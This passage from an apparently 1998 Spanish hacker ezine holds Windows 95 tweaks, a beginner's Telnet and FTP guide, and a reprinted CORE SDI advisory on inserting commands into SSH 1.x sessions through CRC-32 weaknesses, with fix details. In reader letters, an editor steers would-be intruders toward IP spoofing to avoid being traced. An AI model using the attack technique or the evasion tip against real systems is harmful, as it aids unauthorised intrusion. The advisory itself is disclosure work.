  4029.   crear una nueva clave, Shell Icons, despues creamos un nuevo valor de la
  4030.   cadena, con el numero del icono indicado en el DefaultIcon que queremos
  4031.   cambiar, en nuestro caso el 3, seleccionamos este valor, pulsamos 2 veces y
  4032.   en Informacion del valor introducimos el path del archivo que tiene el
  4033.   icono que queremos poner, con su numero correspondiente. En mi caso es:
  4034.  
  4035.   nombre                 | datos
  4036.   (predeterminado)         (valor no establecido)
  4037.   3                        "c\iconos\folders.icl,70"
  4038.  
  4039.         Bueno.. ya hemos hecho lo mas dificil. Pero aun queda algo mas.
  4040.   Windows 95 guarda una cache de Iconos en el directorio de instalacion del
  4041.   95, llamado ShellIconCache, este archivo esta oculto. Debemos de borrar
  4042.   este archivo para que los cambios surjan efecto, pero hay que borrarlo
  4043.   fuera de la sesion de Windows.. osea.. que hay que reiniciar en modo MS-DOS,
  4044.   quitar los atributos al archivo (en MSDOS este se llama shelli~1), borrarlo
  4045.   y reiniciar el entorno grafico (hoy en dia llamado sistema operativo.. :P)
  4046.   y ya esta, tenemos nuestro icono favorito como icono de carpeta.. :) De
  4047.   igual manera con el resto de los iconos del 95.
  4048.  
  4049.         PD: Importante, si tenemos la utilidad TWEAK UI de las Powertoys de
  4050.   Microchof  (si, MICROCHOF... ) podemos borrar el cache de iconos desde la
  4051.   pestaña Repair, con el boton Rebuid Icons. Y si tenemos el MicroAngelo..
  4052.   todo esto nos lo hace ese fantastico programa.. pero conviene saber hacer
  4053.   las cosas "a pelo".
  4054.  
  4055.   4.INTERFACE DEL W3.11 EN EL W95
  4056.  
  4057.         este es bastante mas simple que el anterior, lo que tienes que hacer
  4058.   es lo siguiente:
  4059.   1- edita el archivo "SYSTEM.INI" (directorio de windows)
  4060.   2- en la seccion "BOOT", busca la linea que pone "SHELL=EXPLORER.EXE"
  4061.   3- cambia lo de "EXPLORER.EXE" por "PROGMAN.EXE"
  4062.   4- reinicia el pc y listo.
  4063.  
  4064.   5.ACCESO DIRECTO PARA APAGAR EL PC
  4065.  
  4066.         esto es de lo mas simple, haz lo siguiente: crea una cceso directo en
  4067.   el escritori,vete a propiedades y en loreferente a acceso direco busca
  4068.   "DESTINO".alli pones lo siguiente:
  4069.   C:\WINDOWS\RUNDLL32.EXE user.exe,ExitWindows le das a aplicar, acetar y ya
  4070.   esta.
  4071.  
  4072.   6.cambiar el nombre de "MI PC"
  4073.  
  4074.         para hacer esot tienes que seguir los siguientes pasos: vete al
  4075.   "REGEDIT" cambia la clave::
  4076.   HKEY_CLASSES_ROOT\CLSID\{2OD04FE0-3AEA-1069-A2D8-08002B30309D} pon el
  4077.   nombre quele quieras poner a "MI PC" y ya esta.
  4078.  
  4079.   7.MS2.sys
  4080.  
  4081.         lo primero que tienes que hacer es localzar este archivo, una vez
  4082.   encontrado, para poder editarlo tendras que cambiar sus atributos.
  4083.   una vez puedas editarlo, dirijete a la parte de "OPTIONS":
  4084.  
  4085.   [Options]
  4086.  
  4087.   BootDelay = 0 Aumenta la velocidad de booteo,el mensaje "Starting Windows.."
  4088.               no aparece.
  4089.  
  4090.   BootMenu = 1 Despliega automaticamente el menu de arranque de WIndows 95.
  4091.  
  4092.   BootMenuDefault = 1 El numero de opcion por default.
  4093.  
  4094.   BootMenuDelay = 10 Numero de segundos que el menu de inicio es desplegado.
  4095.  
  4096.   Logo = 0 No despliega la imagen del logo de arranque de Win95.
  4097.  
  4098.   BootMulti = 1 Hace disponible un doble booteo con DOS.
  4099.  
  4100.   8.UTILES DEL SISTEMA
  4101.  
  4102.         el w95 trae algunas erramientas que te permitiran hacer cosillas
  4103.   (algo basicas) muy interesantes para ir empezando, aqui te voy a explicar el
  4104.   funcionamiento de dos de ellas el Telnet, un viejo amigo que ya conoce todo
  4105.   el mundo y el Ftp, si si, has leido bien el 95 (bueno en realidad el MS2)
  4106.   trae una version bastante simple (pero util) de programa FTP.
  4107.  
  4108.   TELNET.
  4109.  
  4110.         en la carpeta windows (o como la ayas llamado) hay un .exe que se
  4111.   llama Telnet, este programa sirve para hacer conexiones desde tu sistema a
  4112.   otro remoto a traves de una red (internet principalmente), en lo que
  4113.   consiste basicamente este programa es en acceder a unos determinados
  4114.   puesrtos de un sistema remoto en los cuales puedes hacer varias cosas, como
  4115.   por ejm: bajarte el correo,mirar el directorio de una web.....
  4116.         aqui te expongo una lista de los puertos con una descripcion de para
  4117.   lo que vale cada uno de ellos: (el numero que aparece entre parentesis es
  4118.   el puerto)
  4119.  
  4120.   auth (113)
  4121.   conference (531)
  4122.   courier (530)
  4123.   daytime (13)
  4124.   discard (9)
  4125.   domain (53)
  4126.   echo (7)
  4127.   efs (520)
  4128.   exec (512)
  4129.   finger (79)
  4130.   ftp (21)
  4131.   gopher (70)
  4132.   hostnames (101)
  4133.   http (80)
  4134.   ingreslock (1524)
  4135.   link (87)
  4136.   login (513)
  4137.   mtp (57)
  4138.   nameserver (42)
  4139.   netbios (139)
  4140.   netnews (532)
  4141.   netstat (15)
  4142.   nntp (119)
  4143.   pop2 (109)
  4144.   pop3 (110)
  4145.   proxy (8080)
  4146.   qotd (17)
  4147.   remotefs (556)
  4148.   rje (77)
  4149.   sftp (115)
  4150.   shell (514)
  4151.   smtp (25)
  4152.   spooler (515)
  4153.   sunrpc (111)
  4154.   supdup (95)
  4155.   systat (11)
  4156.   telnet (23)
  4157.   tempo (526)
  4158.   tftp (69)
  4159.   time (37)
  4160.   uucp (540)
  4161.   uucp-path (117)
  4162.   whois (43)
  4163.   www (80)
  4164.  
  4165.   ¿como se hace un Telnet?
  4166.   pues hacerlo es muy simple:
  4167.  
  4168.         si nos proporcionan la direccion telnet "maquina.remota.es 2010"
  4169.   hariamos lo siguiente: (puede variar segun sistemas):
  4170.   * Tecleamos en la linea de comandos "TELNET maquina.remota.es 2010" (En
  4171.     otros sistemas teclearemos "TELNET" y despuΘs "OPEN maquina.remota.es
  4172.     2010" ) con lo que veremos algo parecido a esto:
  4173.  
  4174.    * telnet MAQUINA.REMOTA.ES 2010
  4175.    * Trying 130.132.21.53 Port 2010 ...
  4176.    * Connected to MAQUINA.REMOTA.ES
  4177.    * Escape character is ...
  4178.  
  4179.   * Esto nos dice mas o menos que esta intentando conectar con la direccion,
  4180.     nos devuelve la direccion IP, se conecta, y nos dice cual es el "caracter
  4181.     escape".
  4182.   * Una vez hemos conectado se nos pide un "login" y/o "password" para entrar
  4183.     a la maquina remota. En algunos casos podremos conectar a la maquina
  4184.     remota con el login "guest" (invitado) pero la mayoria de las veces
  4185.     deberemos saber el login antes de conectarnos.
  4186.   * El siguiente paso es configurar la emulacion de terminal, es decir,
  4187.     decirle al sitio remoto como queremos que nos muestre los datos en
  4188.     nuestra pantalla. La configuracion mas comun es la VT100, que es la
  4189.     estandar para las comunicaciones basadas en terminales. (algunos clientes
  4190.     telnet configuran ellos la emulacion).
  4191.   * El ultimo paso (despues de haber utilizado el servicio es salir ;-) Como
  4192.     las pulsaciones de tecla no las hacemos "realmente" en nuestra maquina,
  4193.     sino en la maquina remota, necesitamos el "caracter escape" que se nos
  4194.     dia al conectar para pasar al "modo comando" ( habitualmente teclas
  4195.     control + parentesis derecho ).
  4196.  
  4197.   Comandos disponibles:
  4198.  
  4199.   CLOSE Termina la conexion TELNET con la maquina remota y vuelve al
  4200.         "modo comando" (si empezamos alli) o sale de TELNET.
  4201.   QUIT  Sale del programa TELNET; si estas conectado a una maquina
  4202.         remota, QUIT te desconecta y luego sale de TELNET.
  4203.   SET ECHO Si no ves lo que estas escribiendo, o si escribes y ves doble,
  4204.            este comando soluciona el problema.
  4205.   OPEN Abre una conexion a una maquina remota.
  4206.  
  4207.         ATENCION: Al presionar las teclas Enter o Return, sales del modo
  4208.   comando TELNET y vuelves a la sesion TELNET. te dejo aqui, investiga y
  4209.   juega con telnet, no es muy dificil y pronto aprenderas a usarlo de una
  4210.   manera mas "productiva".
  4211.  
  4212.   FTP-MS2
  4213.  
  4214.         si entras en Ms2 y en el promp pones "ftp" te saldra esto "ftp>"
  4215.   ahora parasaber los comandos que puedes usar pon "?" y te saldra una lista
  4216.   de los comandos que puedes usar en el programa, juega con ellos y prueba
  4217.   cosas 
  4218.  
  4219.   9.PROXImamente....
  4220.  
  4221.         pues la verdad es que no se que voy a incluir, si tienes algo que
  4222.   comentar o quieres mandarme cosas nuevas ya sabes mandamelas a
  4223.   zed@mixmail.com y sera incluido en la proxima actualizacion
  4224.  
  4225.   bye--:) 
  4226.  
  4227. <────────────────────────────────────────────────────────────────────────────>
  4228. ██████████████████████████████████████████████████████████████████████████████
  4229. <────────────────────────────────────────────────────────────────────────────>
  4230.  
  4231.                              CORE SDI S.A.
  4232.                         Buenos Aires, Argentina
  4233.                        <http://www.core-sdi.com>
  4234.  
  4235.                        Advertencia de Seguridad
  4236.                           11 de Junio de 1998
  4237.  
  4238.                        Ataque de insercion a SSH
  4239.                        
  4240.  
  4241.   Esta advertencia trata sobre un problema de seguridad presente
  4242.   en el paquete de software SSH que permite a un atacante ejecutar
  4243.   comandos arbitrarios en el servidor SSH o, de manera mas general,
  4244.   insertar datos arbitrarios en un canal SSH encriptado.
  4245.  
  4246.  
  4247.   Descripcion del problema
  4248.   ~~~~~~~~~~~~~~~~~~~~~~~~
  4249.   SSH (Secure Shell) es un programa que proporciona autenticacion
  4250.   fuerte y comunicaciones seguras sobre canales inseguros.
  4251.   Es ampliamente usado para sesiones interactivas remotas, transferencia
  4252.   de archivos y encapsulado de otros protocolos en un tunel 
  4253.   sobre un canal de comunicacions encriptado.
  4254.   Todas las comunicaciones son encriptadas automaticamente y
  4255.   de manera transparente.
  4256.   La encripcion es tambien utilizada para realizar chequeo de la
  4257.   integridad de los datos, sin embargo implementaciones actuales
  4258.   se basan en un Chequeo Ciclico de Redundancia de 32 bits (CRC-32)
  4259.   para verificar la integridad despues de la desencripcion de un
  4260.   paquete SSH recibido.
  4261.  
  4262.   La encripcion se realiza utilizando uno de los algoritmos soportados
  4263.   tanto por el cliente como el servidor.
  4264.   Una vez establecida una conexion entre cliente y servidor, ambos
  4265.   realizan un protocolo de negociacion que  incluye autenticacion
  4266.   mutua, eleccion de un algoritmo criptografico a utilizar e
  4267.   intercambio de una clave de sesion a utilizar con dicho algoritmo.
  4268.   Terminada la negociacion se activa la encripcion, todo comunicacion
  4269.   subsiguiente esta encriptada.
  4270.  
  4271.   Los algoritmos de encripcion soportados por la version actual de SSH son:
  4272.  
  4273.   - Blowfish
  4274.     Encriptor de bloque de Bruce Schneier con clave de 128 bits.
  4275.   - IDEA
  4276.     Encriptor de bloque con clave de 128 bits.
  4277.   - DES
  4278.     Data Encrryption Standard, encriptor de bloque con clave de 56 bits 
  4279.   - Triple DES (3DES)
  4280.     Version triple de DES con tres claves para un total efectivo
  4281.     de 112 bits de clave.
  4282.   - ARCFOUR
  4283.     Encriptor de canal compatible con RC4 con clave 128 bits
  4284.  
  4285.    El uso de estos algoritmos en modo CBC (Cipher Block Chaining)
  4286.    o CFB ( Cipher FeedBack 64 bits) en conjuncion con CRC-32 para
  4287.    realizar chequeo de integridad posibilita  un ataque de
  4288.    texto conocido (known plaintext attack) con tan solo
  4289.    16 bytes de texto conocido (8 para el caso de IDEA en modo
  4290.    CFB) que permite a un atacante insertar paquetes encriptados
  4291.    en el canal de comunicacion entre cliente y servidor que 
  4292.    pasaran las pruebas de integridad y se desencriptaran a
  4293.    el texto en claro enviado. De esta manera, un atacante
  4294.    podra ejecutar comandos arbitrarios en el servidor.
  4295.    El mismo ataque puede realizarse sobre el cliente, aunque
  4296.    solo hace posible el envio de datos arbitrarios a la terminal
  4297.    del cliente. Las implicacias de un ataque al cliente son
  4298.    tal vez no tan como un ataque al servidor pero aun asi deben
  4299.    ser consideradas durante el proceso de solucion del problema.
  4300.    
  4301.   Detalles tecnicos
  4302.   ~~~~~~~~~~~~~~~~~
  4303.    Despues de la fase de identificacion del protocolo, donde
  4304.    el servidor envia un string de texto en claro especificando
  4305.    su version de protocolo y de software, toda la comunicacion se
  4306.    realiza encapsulando los datos en un formato de paquetes descripto
  4307.    como "The Binary Packet Protocol" [1]
  4308.    
  4309.    Se indica dicho formato a continuacion:
  4310.  
  4311.               32         24        16         8         0
  4312.                +----------+---------+---------+---------+
  4313.                |        data length (bytes)             |
  4314.                +----------+---------+---------+---------+
  4315.                |    de 1 a 8 bytes de relleno           |
  4316.                =            ( padding )                 = 
  4317.                +----------+---------+---------+---------+
  4318.                |   type   |                             |
  4319.                +----------+                             +
  4320.                |                                        |
  4321.                =                 data                   =
  4322.                |                                        |
  4323.                +----------+---------+---------+---------+
  4324.                |                CRC-32                  |
  4325.                +----------+---------+---------+---------+
  4326.  
  4327.    Data length: Tamanio en bytes del paquete, sin incluir
  4328.                 el campo 'length' y los bytes de relleno.
  4329.    Padding    : 8 - (length mod 8) byte de datos aleatorios.
  4330.                 El uso de datos aleatorios al principio del
  4331.                 paquete es un inteto por hacer mas dificiles
  4332.                 ataques de texto en claro conocido 
  4333.                 (known plaintext attacks)
  4334.    
  4335.    Packet type: Un byte sin signo de 8 bits
  4336.    Data       : length - 5 bytes de datos
  4337.    CRC-32     : 4 bytes para el chequeo de integridad.
  4338.                 El CRC se calcula antes de realizar
  4339.                 la encripcion.
  4340.              
  4341.   La encripcion se realiza sobre los campos 'padding', 'type',
  4342.   'data' y 'CRC', el campo 'length' nunca se encripta. La parte
  4343.   encriptada del paquete tiene un tamanio que es siempre multiplo
  4344.   de 8 bytes.
  4345.  
  4346.   Conociendo ciertas caracteristicas de los modos de encripcion
  4347.   utilizados (CBC por ejemplo), con un texto en claaro conocido, un
  4348.   atacante puede construir un paquete SSH propio ( del tipo
  4349.   SSH_CMSG_STDIN_DATA) con los bytes de relleno calculados
  4350.   de tal manera que los siguientes 8 bytes del paquete se 
  4351.   desencriptaran a un texto en claro a eleccion del atacante.
  4352.   En este caso en particular, los bytes desencriptados corresponderan
  4353.   al campo 'type' y 7 bytes de datos.
  4354.   Despues de esto 16 bytes (relleno+tipo+7 bytes de datos) el 
  4355.   atacante debe incluir una cantidad variable de bytes calculados
  4356.   con el proposito especifico de producir un CRC-32 valido para todo
  4357.   el paquete una ves que el mismo es desencriptado.
  4358.  
  4359.   Este ataque y variaciones utilizando la misma tecnica puede realizarse
  4360.   debido al uso de un esquema de verificacion de integridad que
  4361.   es inherentemente debil. En particular CRC-32 posse ciertas
  4362.   propiedades que permiten al atacante generar un paquete con
  4363.   datos arbitrario y aun asi obtener un valor de CRC que es valido.
  4364.  
  4365.   Por supuesto que para que este ataque sea exitoso el atacante
  4366.   debe tener acceso al canal encriptado entre cliente y servidor,
  4367.   ya sea realizando un ataque activo de red, interponiendose
  4368.   entre cliente y servidor a nivel de aplicacion SSH o realizando
  4369.   un ataque de toma de sesion TCP. 
  4370.   Un ataque de este ultimo tipo se describe en [6] y para
  4371.   el caso de SSH los dos metodos de de-sincronizacion de
  4372.   TCP mencionados pueden ser utilizados. 
  4373.   Especificamente, el metodo descripto como "Null data
  4374.   desynchronization" puede realizarse utilizando paquetes
  4375.   SSH de tipo SSH_CMSG_IGNORE.
  4376.  
  4377.   Es importante senalar que la nueva revision del protocolo
  4378.   SSH, propuesta y publicada como Internet Drafts [2], [3], [4]
  4379.   y [5] hace uso de codigos de autenticacion de mensajes (MACs)
  4380.   criptograficamente fuerte y no suceptibles a este ataque.
  4381.  
  4382.   Aun cuando se hallan encontrado problemas en el protocolo 
  4383.   SSH, es todavia una alternativa mucho mas segura que el uso de
  4384.   las aplicaciones telnet, rsh y rlogin.
  4385.   
  4386.   [1] "The SSH (Secure Shell) Remote Login Protocol", T. Ylonen
  4387.        Helsinki University of Technology. November 15th 1995
  4388.        (draft expired on May 15th, 1996)
  4389.  
  4390.        Included as the file ./RFC in the ssh distribution
  4391.        <http://www.cs.hut.fi/ssh>
  4392.  
  4393.   [2] "SSH Protocol Architecture", draft-ietf-secsh-architecture-01.txt.gz
  4394.        T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 
  4395.  
  4396.   [3] "SSH Connection Protocol", draft-ietf-secsh-connect-03.txt.gz
  4397.        T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 
  4398.  
  4399.   [4] "SSH Authentication Protocol", draft-ietf-secsh-userauth-03.txt.gz
  4400.        T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 
  4401.  
  4402.   [5] "SSH Transport Layer Protocol",draft-ietf-secsh-transport-03.txt.gz
  4403.        T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 
  4404.    
  4405.        (drafts expired on May 7th, 1998)
  4406.  
  4407.   Todos los Internet Drafts estan disponibles en:
  4408.   <ftp://ftp.isi.edu/internet-drafts/>
  4409.  
  4410.   [6] "Simple Active Attack Against TCP", Laurent Joncheray, 
  4411.       Merit Networks Inc., 5th USENIX Security Simposium. 1995.
  4412.  
  4413.   Impacto:
  4414.   ~~~~~~~~
  4415.    Un atacante con acceso al canal SSH encriptado puede 
  4416.    insertar bloque en el canal que se desencriptaran
  4417.    a text en claro de su eleccion pusibilitando la ejecucion
  4418.    de cualquier comando en el servidor SSH.
  4419.  
  4420.   Informacion para solucionar el problema
  4421.   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4422.    Haga un upgrade a la version 2 del protocolo SSH, 
  4423.    disponible al publico en los proximos dias.
  4424.  
  4425.    Usuarios de la version comercial F-Secure SSH deben
  4426.    contactar a Data Fellows Inc. para informacion
  4427.    sobre como realizar el upgrade a F-Secure SSH 2.0
  4428.  
  4429.    Note que la version 2 del protocolo NO es compatible
  4430.    con las versiones anteriors y por lo tanto tambien
  4431.    necesitara hacer un upgrade de los clientes SSH.
  4432.    
  4433.    Mientras tanto puede realizar un upgrade a la version
  4434.    1.2.25 de SSH, que soluciona el problema. 
  4435.    La distribucion 1.2.25 puede obtenerse de:
  4436.    
  4437.     <ftp://ftp.cs.hut.fi/pub/ssh/ssh-1.2.25.tar.gz>
  4438.  
  4439.    La version 1.3.5 de F-Secure SSH soluciona este problema.
  4440.    Si Ud. usa el paquete comercial Data Fellows SSH y tiene un
  4441.    contrato de soporte puede obtener F-Secure SSH de su
  4442.    distribuidor local.
  4443.    Usuarios sin contrato de soporte pueden obterner un patch
  4444.    que soluciona el problema de:
  4445.  
  4446.    <http://www.DataFellows.com/f-secure/support/ssh/bug/su134patch.html>
  4447.  
  4448.    Adicionalmente, puede obtener un patch para la distribucion
  4449.    libre SSH 1.2.23 y el paquete complete con el patch instalado
  4450.    de:
  4451.  
  4452.     <http://www.core-sdi.com/ssh>
  4453.  
  4454.    A continuacion se incluyen los hashes MD5 de los archivos
  4455.    correspondientes
  4456.  
  4457.    MD5 (ssh-1.2.23-core.tar.Z) = fffb52122aae26c1f212c051a305a310
  4458.    MD5 (ssh-1.2.23-core.tar.gz) = f9509ba0f0715637805c6b116adc0869
  4459.    MD5 (ssh-1.2.23.patch) = 6bdb63d57f893907191986c5ced557ab
  4460.  
  4461.   Sistemas vulnerables:
  4462.   ~~~~~~~~~~~~~~~~~~~~
  4463.    Todos los sistemas utilizando implementacions de la version 1.x
  4464.    de SSH son vulnerables. Esto incluye versiones de software hasta
  4465.    la 1.2.23 y F-Secure SSH 1.3.4
  4466.  
  4467.    Para determinar que version de SSH esta corriendo su servidor
  4468.    utilice los siguientes comandos:
  4469.  
  4470.    $ telnet <direccion IP del servidor> 22
  4471.    Trying <direccion IP del servidor>...
  4472.    Connected to <direccion IP del servidor>.
  4473.    Escape character is '^]'.
  4474.    SSH-1.5-1.2.23
  4475.        \ / \--------- version de software
  4476.         |------------ version del protocolo
  4477.  
  4478.    ^]
  4479.    telnet> close
  4480.    Connection closed.
  4481.    $ exit
  4482.      
  4483.   Informacion adicional
  4484.   ~~~~~~~~~~~~~~~~~~~~~
  4485.    Este problema fue descubierto por Ariel Futoransky
  4486.    <futo@core-sdi.com> y Emiliano Kargieman <ek@core-sdi.com>
  4487.  
  4488.    CORE SDI agradece a Tatu Ylonen <ylo@ssh.fi> y Tero Kivinen 
  4489.    <kivinen@ssh.fi>, quienes realizan el mantenimiento de SSH, por
  4490.    su pronta respuesta a los problemas descriptos en esta 
  4491.    advertencia de seguridad.
  4492.  
  4493.    La informacion para la solucion del problema en los
  4494.    productos F-Secure de Data Fellows Inc. fue proporcionada
  4495.    por  Olli Voima <olli.voima@DataFellows.com>
  4496.  
  4497.    Preguntas y comentarios con respecto a esta advertencia
  4498.    de seguridad pueden ser enviados a:
  4499.  
  4500.     Ariel Futoransky <futo@core-sdi.com> 
  4501.     Emiliano Kargieman <ek@core-sdi.com>
  4502.  
  4503.   Para mayor informacion sobre CORE SDI S.A. puede contactar a
  4504.   <core@core-sdi.com> o visitar <http://www.core-sdi.com>
  4505.  
  4506.   Si desea contactar a CORE puede utilizar la siguiente clave
  4507.   publica de PGP:
  4508.  
  4509.   Type Bits/KeyID    Date       User ID
  4510.   pub  1024/CF4E0CF5 1998/05/18 CORELABS <corelabs@core-sdi.com>
  4511.  
  4512.   -----BEGIN PGP PUBLIC KEY BLOCK-----
  4513.   Version: 2.6.3ia
  4514.   Comment: Requires PGP version 2.6 or later.
  4515.  
  4516.   mQCNAzVgfMgAAAEEAJSfJNdvCwIAc4AK0ckeimubLIwzsRVDRhjPQIOYt/7kxxio
  4517.   DZybr53fwMEjyT8cHXRL08i0R9rcuFeCNAez6XcalbhqUKXDcLL/cZK80CCDSCs5
  4518.   tRCZGGOEBnXQIoyvbvi4gNYhBS5wUvmh3b/mvRFTvhmRrUy9m/nO/LnPTgz1AAUR
  4519.   tCBDT1JFTEFCUyA8Y29yZWxhYnNAY29yZS1zZGkuY29tPokAlQMFEDVgfMn5zvy5
  4520.   z04M9QEBC6ED/0Szt3f54JTvkZG3ezQ8G60HvAw4/A5Ti6i3oze6jsXxzGp6pA1x
  4521.   i0jaZpKaUSpo0MLc7BcijMKneuUHnN3XtN5YxtFt0aEoot1MIvv4BsdeUb3x257G
  4522.   3+vr8SxGk44Vm4tfuN8F/2dNo/00yYP9rd3zQ8Tl+gmr5VxnLViZIDuh
  4523.   =ulRg
  4524.   -----END PGP PUBLIC KEY BLOCK-----
  4525.  
  4526.   Copyright Notice:
  4527.   ~~~~~~~~~~~~~~~~~
  4528.   El contenido de esta advertencia de seguridad es Copyright (C)
  4529.   1998 de CORE SDI S.A. y puede ser distribuido libremente
  4530.   siempre y cuando se haga en forma gratuita y se otorgue el 
  4531.   credito apropiado a los autores originales.
  4532.  
  4533.   $Id: ssh-advisory.txt.esp,v 1.7 1998/06/11 22:05:03 iarce Exp $
  4534.  
  4535. <────────────────────────────────────────────────────────────────────────────>
  4536. ██████████████████████████████████████████████████████████████████████████████
  4537. <────────────────────────────────────────────────────────────────────────────>
  4538.  
  4539.                              ┌─────────────────┐
  4540.                             <  EL LECTOR OPINA  >
  4541.                              └─────────────────┘
  4542.  
  4543.         Esta seccion esta funcionando muy bien por lo visto, pero parece
  4544.   mentira que incluso en el 6 numero, haya lectores que nos escriban al
  4545.   buzon de Hotmail (el cual ya NO es valido) y por otro lado que algunos
  4546.   nos envieis mail's preguntado sobre clases o incluso cosas mucho mas
  4547.   tontas. Lo recomendable es que penseis antes de enviarnos un mail.
  4548.  
  4549.         Es una lastima que todavia esta seccion no haya alcanzado el
  4550.   dinamismo que nosotros pretendiamos, pero seguiremos en nuestra cruzada de
  4551.   intentarlo, algun lector si que se esfuerza en ayudar como podreis
  4552.   comprobar mas abajo, por eso a todos esos muchas gracias. Y ahora a
  4553.   divertirse :)
  4554.  
  4555. <────────────────────────────────────────────────────────────────────────────>
  4556.  
  4557.   Date:  Sat, 25 Jul 1998 07:37:13 GMT
  4558.   From:  Manuel-el oso <sambam@xxxxxxxxxxxxxx>      
  4559.   To:  conde_vampiro@usa.net  
  4560.   Subject:  guia irc  
  4561.  
  4562.   hola conde, 
  4563.   que tal? 
  4564.   acabo de leer tu guhirc..... 
  4565.   esta genial. Enhorabuena! 
  4566.  
  4567.   Si puedes me gustaria que me contestaras 
  4568.   a algunas preguntitas: 
  4569.  
  4570.   Que herramienta hay para "dormir 
  4571.   mi PC portatil" y que al despertar 
  4572.   este justo en el mismo punto 
  4573.   donde lo deje? 
  4574.  
  4575.   Como puedo desensamblar un 
  4576.   binario ejecutable para linux? 
  4577.  
  4578.   existe winzip (o similar) 
  4579.   para linux? 
  4580.  
  4581.   que newsreader utilizas? 
  4582.   que newsgroups frecuentas? 
  4583.  
  4584.   muchas gracias 
  4585.  
  4586.   Manu 
  4587.  
  4588.   PD: aupa JJF! 
  4589.  
  4590.   ,-. __ .-,
  4591.   --;`. ' `.' "Guantanamera....Guajira guantanamera..." 
  4592.   / ( ^__^ ) Zzzzz!! ftp.giga.or.at/pub/hacker/Incoming/spv001.zip 
  4593.   ; `(_`'_)' \ Skate or die! - Madrid 107.4 FM 
  4594.   ' ` .`--'_, ; 
  4595.   ~~`-..._)))(((.' sambam@xxxxxxxxxxxxxx 
  4596.  
  4597.   <------>
  4598.  
  4599.   [ Pues thx por los cumplidos :) Sobre los portatiles, es que eso ya lo
  4600.     hacen, mira la caracteristicas del tuyo. Sobre Linux mira el cursillo que
  4601.     encontraras en este numero y sobre winzip para Linux, yo no conozco.
  4602.     Nunca suelo pasar por las news. ] 
  4603.  
  4604. <────────────────────────────────────────────────────────────────────────────>
  4605.  
  4606.   Date:  Tue, 14 Jul 1998 09:23:23 GMT  
  4607.   From:  jaina7@xxxxxxxxxxxxxx (grieko)      
  4608.   To:  conde_vampiro@usa.net  
  4609.  
  4610.   conde estas ahi? 
  4611.   que paso bueno te escribo pues para tener a alguien que oriente en mis
  4612.   dudas espero respuesta ok sabes algo de novell? 
  4613.   ok 
  4614.  
  4615.   <------>
  4616.  
  4617.   [ Como ya hemos dicho muchas veces no damos clases privadas, nuestro consejo
  4618.     es que leas este ezine. Sobre novell pillate el FAQ DE NOVELL.
  4619.  
  4620.     http://www2.s-gimb.lj.edus.si/natan/stuff2.html
  4621.     http://www.nmrc.org ]
  4622.  
  4623. <────────────────────────────────────────────────────────────────────────────>
  4624.  
  4625.   Date:  Tue, 07 Jul 1998 13:51:20 GMT  
  4626.   From:  "Miguel Soto" <msoto@xxxxxxxxxxxxxx>      
  4627.  
  4628.   Acabo de conocer vuestra pagina a traves de la revista Jump y creo que
  4629.   aparte de un buen diseño tiene mucho contenido que leere poco a poco.
  4630.   Espero que no desaparezca vuestra direccion, como otras de vuestro style,
  4631.   si esto ocurriese o para cualquier otra cuestion mi e-mail es
  4632.   rbellamy@xxxxxxxxxxxxxx , soy cuasiinformatico de carrera osease como aquel
  4633.   que tiene un primo en Alcala que ni es primo ni es na.
  4634.  
  4635.   Estoy en el ordenador de un amigo asi que espero que no le echeis mucha
  4636.   cuenta al remitente.
  4637.     
  4638.   Saludos de un Sevillano fan de la informatica y de comun acuerdo con
  4639.   vuestra filosofia. Roberto.
  4640.  
  4641.   <------>
  4642.  
  4643.   [ ¿ En la revista Jump ?, es la primera noticia que tengo que salimos alli,
  4644.     espero que hayan sido buenas criticas :) Nosotros no pensamos desaparecer
  4645.     si no todo lo contrario nos expandimos, o sea que no te preocupes y
  4646.     siempre estaremos por Inet. ]
  4647.  
  4648. <────────────────────────────────────────────────────────────────────────────>
  4649.  
  4650.   From:  Split <split@xxxxxxxxxxxxxx>
  4651.   To:  conde_vampiro@usa.net  
  4652.   Subject:  Peticion de un documento txt  
  4653.  
  4654.   Holas, vuelvo a escribiros ya que no he recibido respuesta. 
  4655.   Os pedia un documento titulado "La Superguia del Hacker" por Nobody 
  4656.   (hackear desde win95). 
  4657.   Ya que he estado buscando este doc pero no he podido encontrarlo, puesto 
  4658.   que hablaron de el en el n 4 de su ezine, en concreto referente a un 
  4659.   mail :))) 
  4660.   Sin mas y dandote las gracias 
  4661.   Split 
  4662.  
  4663.   <------>
  4664.  
  4665.   [ Garantizado para el nº7 y encima la Version Deluxe :) ]
  4666.  
  4667. <────────────────────────────────────────────────────────────────────────────>
  4668.  
  4669.   Date:  Wed, 10 Jun 1998 02:16:55 GMT
  4670.   From:  "Angel torrez" <mosqueteros_69@xxxxxxxxxxxxxx>      
  4671.   To:  conde_vampiro@usa.net  
  4672.   Subject:  Ayuda Urgente  
  4673.  
  4674.   Estimado conde Vampiro permitame saludarle y desearle una feliz noche 
  4675.   (por que me imagino como es usted vampiro solo saldra por las noches) 
  4676.   bueno como introduccion quiero decirle muchas gracias por todos sus 
  4677.   escritos nos han servido de mucho, tambien ese texto de hack de una Web 
  4678.   estaba muy bien, pero nosotros somos un grupo de personas de Nicaragua 
  4679.   que estamos iniciando en este maravilloso mundo del hackers, por lo cual 
  4680.   nosotros pedimos su ayuda para que nos guie en esta dificil tarea, 
  4681.   seremos sus aprendices, es cierto que una de las reglas es no preguntar 
  4682.   por que supuestamente lo sabemos todo, pero hemos roto esa regla para 
  4683.   abocarnos a usted conde para que nos enseñe a dar unas que otras 
  4684.   mordidas en la net, para iniciar tenemos una pequeña duda, cuando 
  4685.   nosotros nos conectamos por telnet al servidor xxxxx este servidor no 
  4686.   capta nuestro numero de IP, por lo cual ya nos pueden agarrar, esa es 
  4687.   nuestra primera pregunta. 
  4688.   Espero que no la mires tan TONTA. 
  4689.  
  4690.   <------>
  4691.  
  4692.   [ Pues como siempre decimos lee nuestros ezines y documentos :) No entiendo
  4693.     bien tu pregunta, supongo que te refieres a que el server pilla tu IP
  4694.     y quieres saber como evitar eso, pues tienes muchas maneras, IP-SPOOFING
  4695.     es una de ellas y ahora piensa un poco tu :)
  4696.     No existen las preguntas tontas si no preguntas mal formuladas en todo
  4697.     caso ;-) ]
  4698.  
  4699. <────────────────────────────────────────────────────────────────────────────>
  4700.  
